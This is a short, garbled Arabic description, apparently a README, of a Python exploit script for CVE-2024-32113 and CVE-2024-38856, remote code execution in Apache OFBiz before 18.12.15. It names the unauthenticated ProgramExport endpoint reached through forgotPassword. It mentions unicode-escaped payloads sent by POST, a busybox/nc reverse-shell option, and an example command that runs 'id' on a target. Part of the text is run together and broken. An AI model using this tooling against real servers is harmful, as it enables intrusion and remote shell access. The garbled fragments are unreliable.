
CVE-2024-32113 و CVE-2024-38856
يتيح هذا السكريبت بلغة Python استغلال ثغرة تنفيذ الأوامر عن بعد (RCE) في Apache OFBiz (الإصدارات الأقدم من 18.12.15)، عبر وصول غير مصرح به إلى نقطة النهاية /webtools/control/forgotPassword/ProgramExport.
\uXXXX) يُرسل عبر POST.--cmd)busybox/nc (--shell)python3 cve-2024-38856_Scanner.py -u https://TARGET:8443 -c "id"